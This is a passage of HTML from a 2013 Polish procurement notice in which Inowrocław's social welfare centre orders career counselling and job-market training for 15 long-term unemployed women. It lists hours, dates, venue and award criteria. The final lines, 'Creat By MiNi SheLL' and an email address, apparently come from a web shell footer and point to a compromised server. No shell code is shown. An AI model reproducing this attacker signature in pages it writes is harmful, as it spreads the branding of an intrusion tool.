zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia wraz z kopiami ww. zaświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-8, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualne doradztwo zawodowe i trening poruszania się na rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej usługi wraz z przygotowaniem programu zajęć i materiałów szkoleniowych na indywidualne doradztwo zawodowe i trening poruszania się na rynku pracy dla 15 kobiet długotrwale bezrobotnych. Ilość osób do przeszkolenia: 15 osób. Informacja o uczestnikach szkolenia: (Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestniczkom szkolenia udział w zajęciach.). Liczba godzin: 78,75 godzin zegarowych, w tym: 60 godzin zegarowych indywidualnego doradztwa zawodowego (2 spotkania/osobę x 2 godziny zegarowe x 15 osób) oraz 25 godzin lekcyjnych treningu poruszania się na rynku pracy. Terminy zajęć  ze wskazaniem  na poszczególne dni: Indywidualne doradztwo zawodowe: (21, 22, 23 maja 2013 r. i 3 czerwca 2013 r. - pierwsze spotkanie) (17, 18, 19, 20 czerwca 2013 r.  -drugie spotkanie). Trening interpersonalny: 10, 11, 12, 13 czerwca 2013 r. Cele treningu poruszania się na rynku pracy:  zdobycie wiedzy i umiejętności z zakresu metod poszukiwania pracy, autoprezentacji podczas rozmów kwalifikacyjnych, sporządzania dokumentów aplikacyjnych, motywowanie uczestniczek do uzupełnienia wykształcenia niezbędnego do zdobycia tytułu zawodowego w zakresie asystenta osoby niepełnosprawnej.Cele indywidualnego doradztwa zawodowego:  określenie (w formie ankiety i opinii) kwalifikacji zawodowych uczestniczki projektu   w kontekście kursu zawodowego  asystent osoby niepełnosprawnej i skierowania na staż zawodowy,   motywowanie chętnych osób do rozpoczęcia działalności w ramach podmiotów ekonomii społecznej. Terminy zajęć: 21 maja 2013 r.-20 czerwca 2013 r. Miejsce szkolenia: siedziba KIS w Inowrocławiu przy ul. Św. Ducha 90. Zamawiający nieodpłatnie zapewnia pomieszczenia w ww. siedzibie KIS. Prowadzący szkolenie: co najmniej jeden doradca zawodowy  posiadający uprawnienia wymagane prawem i doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o takiej samej lub podobnej tematyce.  Materiały dydaktyczne i inne wymagania Zamawiającego: Uczestniczki kursu muszą otrzymać m.in. skrypty i inne materiały opracowane przez wykonawcę, niezbędne do przeprowadzenia zajęć. Materiały niezbędne do realizacji szkolenia  można skserować  w siedzibie MOPS.Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestniczki ww. materiałów. Jeden zestaw ww. materiałów dla Zamawiającego celem dołączenia do dokumentacji. Działania promocyjne: Wizualizacja zajęć zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest w ramach projektu Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego. Zaświadczenia:Wykonawca wydrukuje  i wyda w dniu ukończenia zajęć wszystkim uczestniczkom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia wraz z kopiami ww. zaświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com